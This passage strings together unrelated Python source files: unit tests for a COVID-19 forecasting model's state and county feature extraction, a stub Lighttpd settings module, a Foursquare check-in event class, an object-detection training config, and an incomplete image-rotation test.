"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.HOSPITALIZED_FEATURE_KEY,
"feature_value": 100,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.HOSPITALIZED_FEATURE_KEY,
"feature_value": 200,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.ICU_FEATURE_KEY,
"feature_value": 2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.ICU_FEATURE_KEY,
"feature_value": 5,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.VENTILATOR_FEATURE_KEY,
"feature_value": 50,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.VENTILATOR_FEATURE_KEY,
"feature_value": 100,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.MOBILITY_INDEX,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.MOBILITY_INDEX,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.MOBILITY_SAMPLES,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.MOBILITY_SAMPLES,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.TOTAL_TESTS,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.TOTAL_TESTS,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_GATHERINGS,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_GATHERINGS,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_EMERGENCY_DECLARATION,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_EMERGENCY_DECLARATION,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_SCHOOLS_SECONDARY_EDUCATION,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_SCHOOLS_SECONDARY_EDUCATION,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_RESTAURANTS,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_RESTAURANTS,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_NON_ESSENTIAL_BUSINESS,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_NON_ESSENTIAL_BUSINESS,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_STAY_AT_HOME,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_STAY_AT_HOME,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_FACE_MASKS,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_FACE_MASKS,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AVERAGE_TEMPERATURE,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AVERAGE_TEMPERATURE,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.MAX_TEMPERATURE,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.MAX_TEMPERATURE,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.MIN_TEMPERATURE,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.MIN_TEMPERATURE,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.RAINFALL,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.RAINFALL,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.SNOWFALL,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.SNOWFALL,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.COMMERCIAL_SCORE,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.COMMERCIAL_SCORE,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.ANTIGEN_POSITIVE,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.ANTIGEN_POSITIVE,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.ANTIGEN_TOTAL,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.ANTIGEN_TOTAL,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.ANTIBODY_NEGATIVE,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.ANTIBODY_NEGATIVE,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.ANTIBODY_TOTAL,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.ANTIBODY_TOTAL,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.RECOVERED_FEATURE_KEY,
"feature_value": 12,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.RECOVERED_FEATURE_KEY,
"feature_value": 11,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.HOSPITALIZED_INCREASE_FEATURE_KEY,
"feature_value": 16,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.HOSPITALIZED_INCREASE_FEATURE_KEY,
"feature_value": 14,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_COUGH,
"feature_value": 0.6,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_COUGH,
"feature_value": 0.7,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_CHILLS,
"feature_value": 0.6,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_CHILLS,
"feature_value": 0.7,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_ANOSMIA,
"feature_value": 0.6,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_ANOSMIA,
"feature_value": 0.7,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_INFECTION,
"feature_value": 0.6,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_INFECTION,
"feature_value": 0.7,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_CHEST_PAIN,
"feature_value": 0.6,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_CHEST_PAIN,
"feature_value": 0.7,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_FEVER,
"feature_value": 0.6,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_FEVER,
"feature_value": 0.7,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_SHORTNESSBREATH,
"feature_value": 0.6,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_SHORTNESSBREATH,
"feature_value": 0.7,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.VACCINES_GOVEX_FIRST_DOSE_TOTAL,
"feature_value": 10,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.VACCINES_GOVEX_FIRST_DOSE_TOTAL,
"feature_value": 20,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.VACCINES_GOVEX_SECOND_DOSE_TOTAL,
"feature_value": 5,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.VACCINES_GOVEX_SECOND_DOSE_TOTAL,
"feature_value": 10,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
])
static_data = pd.DataFrame([{
"feature_name": constants.AQI_MEAN,
"feature_value": 105,
"geo_id": "4059"
}, {
"feature_name": constants.AREA,
"feature_value": 10,
"geo_id": "4058"
}, {
"feature_name": constants.AREA,
"feature_value": 10,
"geo_id": "4059"
}, {
"feature_name": constants.INCOME_PER_CAPITA,
"feature_value": 120,
"geo_id": "4058"
}, {
"feature_name": constants.INCOME_PER_CAPITA,
"feature_value": 100,
"geo_id": "4059"
}, {
"feature_name": constants.POPULATION,
"feature_value": 70,
"geo_id": "4059"
}, {
"feature_name": constants.POPULATION,
"feature_value": 50,
"geo_id": "4058"
}, {
"feature_name": constants.POPULATION,
"feature_value": 10,
"geo_id": "4057"
}])
state_model = us_model_definitions.StateModelDefinition(gt_source="JHU")
static_features, _ = state_model._extract_static_features(
static_data=static_data, locations=["4059"])
actual, _ = state_model._extract_ts_features(
ts_data=ts_data,
static_features=static_features,
locations=["4059"],
training_window_size=2)
expected = {
constants.CONFIRMED: {
"4059": np.array([100, 200], dtype="float32")
},
constants.DEATH: {
"4059": [10, np.nan]
},
constants.DEATH_PREPROCESSED: {
"4059": [0, 0]
},
constants.ICU: {
"4059": np.array([2, 5], dtype="float32")
},
constants.INFECTED: None,
constants.HOSPITALIZED: {
"4059": np.array([100, 200], dtype="float32")
},
constants.MOBILITY_INDEX: {
"4059": np.array([1, 0], dtype="float32")
},
constants.VENTILATOR: {
"4059": np.array([50, 100], dtype="float32")
},
constants.RECOVERED_DOC: {
"4059": np.array([11, 12], dtype="float32")
},
constants.HOSPITALIZED_INCREASE: {
"4059": np.array([14, 16], dtype="float32")
},
constants.HOSPITALIZED_CUMULATIVE: {
"4059": np.array([14, 30], dtype="float32")
},
constants.TOTAL_TESTS_PER_CAPITA: {
"4059": np.array([1, 0], dtype="float32")
},
}
for ts_feature_name in expected:
self.assertIn(ts_feature_name, actual)
np.testing.assert_equal(
actual[ts_feature_name], expected[ts_feature_name],
"Feature name {} is not aligned.".format(ts_feature_name))
def test_get_static_features(self):
expected_static_features = {
constants.POPULATION:
constants.POPULATION,
constants.INCOME_PER_CAPITA:
constants.INCOME_PER_CAPITA,
constants.POPULATION_DENSITY_PER_SQKM:
constants.POPULATION_DENSITY_PER_SQKM,
constants.HOUSEHOLD_FOOD_STAMP:
constants.HOUSEHOLD_FOOD_STAMP,
constants.KAISER_POPULATION:
constants.KAISER_POPULATION,
constants.KAISER_60P_POPULATION:
constants.KAISER_60P_POPULATION,
constants.ICU_BEDS:
constants.ICU_BEDS,
constants.HOUSEHOLDS:
constants.HOUSEHOLDS,
constants.HOSPITAL_RATING1:
constants.HOSPITAL_RATING1,
constants.HOSPITAL_RATING2:
constants.HOSPITAL_RATING2,
constants.HOSPITAL_RATING3:
constants.HOSPITAL_RATING3,
constants.HOSPITAL_RATING4:
constants.HOSPITAL_RATING4,
constants.HOSPITAL_RATING5:
constants.HOSPITAL_RATING5,
constants.AQI_MEAN:
constants.AQI_MEAN,
constants.NON_EMERGENCY_SERVICES:
constants.NON_EMERGENCY_SERVICES,
constants.EMERGENCY_SERVICES:
constants.EMERGENCY_SERVICES,
constants.HOSPITAL_ACUTE_CARE:
constants.HOSPITAL_ACUTE_CARE,
constants.CRITICAL_ACCESS_HOSPITAL:
constants.CRITICAL_ACCESS_HOSPITAL,
constants.PATIENCE_EXPERIENCE_SAME:
constants.PATIENCE_EXPERIENCE_SAME,
constants.PATIENCE_EXPERIENCE_BELOW:
constants.PATIENCE_EXPERIENCE_BELOW,
constants.PATIENCE_EXPERIENCE_ABOVE:
constants.PATIENCE_EXPERIENCE_ABOVE,
}
state_model = us_model_definitions.StateModelDefinition(
gt_source=constants.GT_SOURCE_JHU)
actual_static_features = state_model.get_static_features()
np.testing.assert_equal(expected_static_features, actual_static_features)
def test_extract_state_static_features(self):
static_data = pd.DataFrame([{
"feature_name": constants.AQI_MEAN,
"feature_value": 105,
"geo_id": "4059"
}, {
"feature_name": constants.AREA,
"feature_value": 10,
"geo_id": "4058"
}, {
"feature_name": constants.AREA,
"feature_value": 10,
"geo_id": "4059"
}, {
"feature_name": constants.INCOME_PER_CAPITA,
"feature_value": 120,
"geo_id": "4058"
}, {
"feature_name": constants.INCOME_PER_CAPITA,
"feature_value": 100,
"geo_id": "4059"
}, {
"feature_name": constants.POPULATION,
"feature_value": 70,
"geo_id": "4059"
}, {
"feature_name": constants.POPULATION,
"feature_value": 50,
"geo_id": "4058"
}, {
"feature_name": constants.POPULATION,
"feature_value": 10,
"geo_id": "4057"
}])
state_model = us_model_definitions.StateModelDefinition(gt_source="JHU")
actual, _ = state_model._extract_static_features(
static_data=static_data, locations=["4059", "4058"])
expected = {
constants.AQI_MEAN: {
"4059": 0,
"4058": 0
},
constants.INCOME_PER_CAPITA: {
"4059": 0,
"4058": 1
},
constants.POPULATION: {
"4059": 70,
"4058": 50
},
constants.POPULATION_DENSITY_PER_SQKM: {
"4059": 0,
"4058": 0
},
}
for static_feature_name in expected:
self.assertEqual(actual[static_feature_name],
expected[static_feature_name])
class TestCountyModelDefinition(unittest.TestCase):
def test_get_ts_features(self):
expected_ts_features = {
constants.DEATH:
constants.JHU_COUNTY_DEATH_FEATURE_KEY,
constants.CONFIRMED:
constants.JHU_COUNTY_CONFIRMED_FEATURE_KEY,
constants.RECOVERED_DOC:
constants.CSRP_RECOVERED_FEATURE_KEY,
constants.HOSPITALIZED:
constants.CHA_HOSPITALIZED_FEATURE_KEY,
constants.HOSPITALIZED_CUMULATIVE:
constants.CHA_HOSPITALIZED_CUMULATIVE_FEATURE_KEY,
constants.ICU:
constants.CSRP_ICU_FEATURE_KEY,
constants.MOBILITY_INDEX:
constants.MOBILITY_INDEX,
constants.MOBILITY_SAMPLES:
constants.MOBILITY_SAMPLES,
constants.CSRP_TESTS:
constants.CSRP_TESTS,
constants.AMP_RESTAURANTS:
constants.AMP_RESTAURANTS,
constants.AMP_NON_ESSENTIAL_BUSINESS:
constants.AMP_NON_ESSENTIAL_BUSINESS,
constants.AMP_STAY_AT_HOME:
constants.AMP_STAY_AT_HOME,
constants.AMP_SCHOOLS_SECONDARY_EDUCATION:
constants.AMP_SCHOOLS_SECONDARY_EDUCATION,
constants.AMP_EMERGENCY_DECLARATION:
constants.AMP_EMERGENCY_DECLARATION,
constants.AMP_GATHERINGS:
constants.AMP_GATHERINGS,
constants.AMP_FACE_MASKS:
constants.AMP_FACE_MASKS,
constants.DOW_WINDOW:
constants.DOW_WINDOW,
constants.VACCINES_GOVEX_FIRST_DOSE_TOTAL:
constants.VACCINES_GOVEX_FIRST_DOSE_TOTAL,
constants.VACCINES_GOVEX_SECOND_DOSE_TOTAL:
constants.VACCINES_GOVEX_SECOND_DOSE_TOTAL,
}
county_model = us_model_definitions.CountyModelDefinition(
gt_source=constants.GT_SOURCE_JHU)
actual_ts_features = county_model.get_ts_features()
np.testing.assert_equal(expected_ts_features, actual_ts_features)
def test_get_ts_features_to_preprocess(self):
expected_ts_features = {
constants.MOBILITY_INDEX,
constants.MOBILITY_SAMPLES,
constants.CSRP_TESTS,
constants.CONFIRMED_PER_CSRP_TESTS,
constants.TOTAL_TESTS_PER_CAPITA,
constants.AMP_RESTAURANTS,
constants.AMP_NON_ESSENTIAL_BUSINESS,
constants.AMP_STAY_AT_HOME,
constants.AMP_SCHOOLS_SECONDARY_EDUCATION,
constants.AMP_EMERGENCY_DECLARATION,
constants.AMP_GATHERINGS,
constants.AMP_FACE_MASKS,
constants.DEATH_PREPROCESSED,
constants.CONFIRMED_PREPROCESSED,
constants.DOW_WINDOW,
constants.TOTAL_TESTS_PER_CAPITA,
constants.VACCINATED_RATIO_FIRST_DOSE_PER_DAY_PREPROCESSED,
constants.VACCINATED_RATIO_SECOND_DOSE_PER_DAY_PREPROCESSED,
}
county_model = us_model_definitions.CountyModelDefinition(
gt_source=constants.GT_SOURCE_JHU)
actual_ts_features = county_model.get_ts_features_to_preprocess()
np.testing.assert_equal(expected_ts_features, actual_ts_features)
def test_extract_ts_county_features(self):
ts_data = pd.DataFrame([
{
"feature_name": "confirmed_cases",
"feature_value": 100,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": "confirmed_cases",
"feature_value": 200,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": "deaths",
"feature_value": 10,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": "deaths",
"feature_value": 13,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.MOBILITY_INDEX,
"feature_value": 0.0,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.MOBILITY_INDEX,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.MOBILITY_SAMPLES,
"feature_value": 10,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.MOBILITY_SAMPLES,
"feature_value": 12,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.CSRP_TESTS,
"feature_value": 70,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.CSRP_TESTS,
"feature_value": 140,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_GATHERINGS,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_GATHERINGS,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_EMERGENCY_DECLARATION,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_EMERGENCY_DECLARATION,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_SCHOOLS_SECONDARY_EDUCATION,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_SCHOOLS_SECONDARY_EDUCATION,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_RESTAURANTS,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_RESTAURANTS,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_NON_ESSENTIAL_BUSINESS,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_NON_ESSENTIAL_BUSINESS,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_STAY_AT_HOME,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_STAY_AT_HOME,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_FACE_MASKS,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_FACE_MASKS,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.CSRP_RECOVERED_FEATURE_KEY,
"feature_value": 12,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059",
},
{
"feature_name": constants.CSRP_RECOVERED_FEATURE_KEY,
"feature_value": 11,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059",
},
{
"feature_name": constants.CHA_HOSPITALIZED_FEATURE_KEY,
"feature_value": 100,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059",
},
{
"feature_name": constants.CHA_HOSPITALIZED_FEATURE_KEY,
"feature_value": 200,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059",
},
{
"feature_name": constants.CHA_HOSPITALIZED_CUMULATIVE_FEATURE_KEY,
"feature_value": 200,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059",
},
{
"feature_name": constants.CHA_HOSPITALIZED_CUMULATIVE_FEATURE_KEY,
"feature_value": 300,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059",
},
{
"feature_name": constants.CSRP_ICU_FEATURE_KEY,
"feature_value": 20,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059",
},
{
"feature_name": constants.CSRP_ICU_FEATURE_KEY,
"feature_value": 30,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059",
},
{
"feature_name": constants.VACCINES_GOVEX_FIRST_DOSE_TOTAL,
"feature_value": 10,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.VACCINES_GOVEX_FIRST_DOSE_TOTAL,
"feature_value": 20,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.VACCINES_GOVEX_SECOND_DOSE_TOTAL,
"feature_value": 5,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.VACCINES_GOVEX_SECOND_DOSE_TOTAL,
"feature_value": 10,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
])
static_data = pd.DataFrame([{
"feature_name": constants.AREA,
"feature_value": 10,
"geo_id": "4059"
}, {
"feature_name": constants.AREA,
"feature_value": 10,
"geo_id": "4058"
}, {
"feature_name": constants.INCOME_PER_CAPITA,
"feature_value": 120,
"geo_id": "4058"
}, {
"feature_name": constants.INCOME_PER_CAPITA,
"feature_value": 100,
"geo_id": "4059"
}, {
"feature_name": constants.COUNTY_POPULATION,
"feature_value": 70,
"geo_id": "4059"
}, {
"feature_name": constants.COUNTY_POPULATION,
"feature_value": 50,
"geo_id": "4058"
}, {
"feature_name": constants.COUNTY_POPULATION,
"feature_value": 10,
"geo_id": "4057"
}])
state_model = us_model_definitions.CountyModelDefinition(
gt_source="USAFACTS")
static_features, _ = state_model._extract_static_features(
static_data=static_data, locations=["4059"])
actual, _ = state_model._extract_ts_features(
ts_data=ts_data,
static_features=static_features,
locations=["4059"],
training_window_size=2)
expected = {
constants.DEATH: {
"4059": np.array([10, 13], dtype="float32")
},
constants.CONFIRMED: {
"4059": np.array([100, 200], dtype="float32")
},
constants.MOBILITY_SAMPLES: {
"4059": np.array([0, 1], dtype="float32")
},
constants.MOBILITY_INDEX: {
"4059": np.array([0, 1], dtype="float32")
},
constants.CSRP_TESTS: {
"4059": np.array([0, 1], dtype="float32")
},
constants.RECOVERED_DOC: {
"4059": np.array([11, 12], dtype="float32"),
},
constants.HOSPITALIZED: {
"4059": np.array([100, 200], dtype="float32"),
},
constants.HOSPITALIZED_CUMULATIVE: {
"4059": np.array([200, 300], dtype="float32"),
},
constants.ICU: {
"4059": np.array([20, 30], dtype="float32"),
},
constants.TOTAL_TESTS_PER_CAPITA: {
"4059": np.array([0, 0], dtype="float32"),
},
}
for ts_feature_name in expected:
self.assertIn(ts_feature_name, actual)
np.testing.assert_equal(
actual[ts_feature_name], expected[ts_feature_name],
"Unexpected value for feature %s" % ts_feature_name)
def test_get_static_features(self):
county_model = us_model_definitions.CountyModelDefinition(
gt_source=constants.GT_SOURCE_JHU)
actual_static_features = county_model.get_static_features()
self.assertEqual(len(actual_static_features), 51)
def test_get_all_locations(self):
input_df = pd.DataFrame(
{constants.GEO_ID_COLUMN: ["4059", "4060", "4061", "4062"]})
    # Exclude FIPS 15005 (Kalawao County, which no longer exists)
expected_locations = {"4059", "4060", "4061", "4062"}
county_model = us_model_definitions.CountyModelDefinition(
gt_source=constants.GT_SOURCE_JHU)
actual_locations = county_model.get_all_locations(input_df)
np.testing.assert_equal(expected_locations, actual_locations)
def test_extract_county_static_features(self):
static_data = pd.DataFrame([{
"feature_name": constants.AREA,
"feature_value": 10,
"geo_id": "4059"
}, {
"feature_name": constants.AREA,
"feature_value": 10,
"geo_id": "4058"
}, {
"feature_name": constants.INCOME_PER_CAPITA,
"feature_value": 120,
"geo_id": "4058"
}, {
"feature_name": constants.INCOME_PER_CAPITA,
"feature_value": 100,
"geo_id": "4059"
}, {
"feature_name": constants.COUNTY_POPULATION,
"feature_value": 70,
"geo_id": "4059"
}, {
"feature_name": constants.COUNTY_POPULATION,
"feature_value": 50,
"geo_id": "4058"
}, {
"feature_name": constants.COUNTY_POPULATION,
"feature_value": 10,
"geo_id": "4057"
}])
county_model = us_model_definitions.CountyModelDefinition(gt_source="JHU")
actual, _ = county_model._extract_static_features(
static_data=static_data, locations=["4059", "4058"])
expected = {
constants.INCOME_PER_CAPITA: {
"4059": 0,
"4058": 1
},
constants.POPULATION: {
"4059": 70,
"4058": 50
}
}
for static_feature_name in expected:
self.assertEqual(actual[static_feature_name],
expected[static_feature_name],
"Unexpected value for feature %s" % static_feature_name)
if __name__ == "__main__":
unittest.main()
|
core/modules/lighttpd.py | HaonTshau/inpanel | 166 | 12697167 | <filename>core/modules/lighttpd.py<gh_stars>100-1000
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 - 2019, doudoudzj
# All rights reserved.
#
# InPanel is distributed under the terms of the New BSD License.
# The full license can be found in 'LICENSE'.
"""Module for Lighttpd configuration management."""
def web_response(self):
action = self.get_argument('action', '')
if action == 'getsettings':
self.write({'code': 0, 'msg': 'Lighttpd 配置信息获取成功!', 'data': get_config()})
elif action == 'savesettings':
self.write({'code': 0, 'msg': 'Lighttpd 服务配置保存成功!', 'data': set_config(self)})
return
def get_config():
return dict()
def set_config(self):
return dict()
|
platypush/message/event/foursquare.py | RichardChiang/platypush | 228 | 12697178 | <gh_stars>100-1000
from typing import Dict, Any
from platypush.message.event import Event
class FoursquareCheckinEvent(Event):
"""
Event triggered when a new check-in occurs.
"""
def __init__(self, checkin: Dict[str, Any], *args, **kwargs):
super().__init__(*args, checkin=checkin, **kwargs)
# vim:sw=4:ts=4:et:
|
configs/baseline/faster_rcnn_r50_caffe_fpn_coco_partial_180k.py | huimlight/SoftTeacher | 604 | 12697204 | <filename>configs/baseline/faster_rcnn_r50_caffe_fpn_coco_partial_180k.py<gh_stars>100-1000
_base_ = "base.py"
fold = 1
percent = 1
data = dict(
samples_per_gpu=1,
workers_per_gpu=1,
train=dict(
ann_file="data/coco/annotations/semi_supervised/instances_train2017.${fold}@${percent}.json",
img_prefix="data/coco/train2017/",
),
)
work_dir = "work_dirs/${cfg_name}/${percent}/${fold}"
log_config = dict(
interval=50,
hooks=[
dict(type="TextLoggerHook"),
dict(
type="WandbLoggerHook",
init_kwargs=dict(
project="pre_release",
name="${cfg_name}",
config=dict(
fold="${fold}",
percent="${percent}",
work_dirs="${work_dir}",
total_step="${runner.max_iters}",
),
),
by_epoch=False,
),
],
)
|
python/cucim/src/cucim/core/operations/spatial/tests/test_rotate90.py | aasthajh/cucim | 131 | 12697208 | <reponame>aasthajh/cucim
import os
import cupy
import numpy as np
import pytest
import skimage.data
from PIL import Image
import cucim.core.operations.spatial as spt
def get_input_arr():
img = skimage.data.astronaut()
arr = np.asarray(img)
arr = np.transpose(arr)
return arr
def get_rotated_data():
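    # Load the pre-rotated reference image stored next to this test module.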
dirname = os.path.dirname(__file__)
img1 = Image.open(os.path.join(os.path.abspath(dirname), "rotated.png"))
arr_o = np.asarray(img1)
arr_o = np.transpose(arr_o)
return arr_o
def test_rotate90_param():
arr = get_input_arr()
with pytest.raises(TypeError):
img = Image.fromarray(arr.T, 'RGB')
spt.image_rotate_90(img, 1, [1, 2])
def test_rotate90_numpy_input():
arr = get_input_arr()
rotate90_arr = get_rotated_data()
output = spt.image_rotate_90(arr, 1, [1, 2])
assert np.allclose(output, rotate90_arr)
def test_rotate90_cupy_input():
arr = get_input_arr()
rotate90_arr = get_rotated_data()
cupy_arr = cupy.asarray(arr)
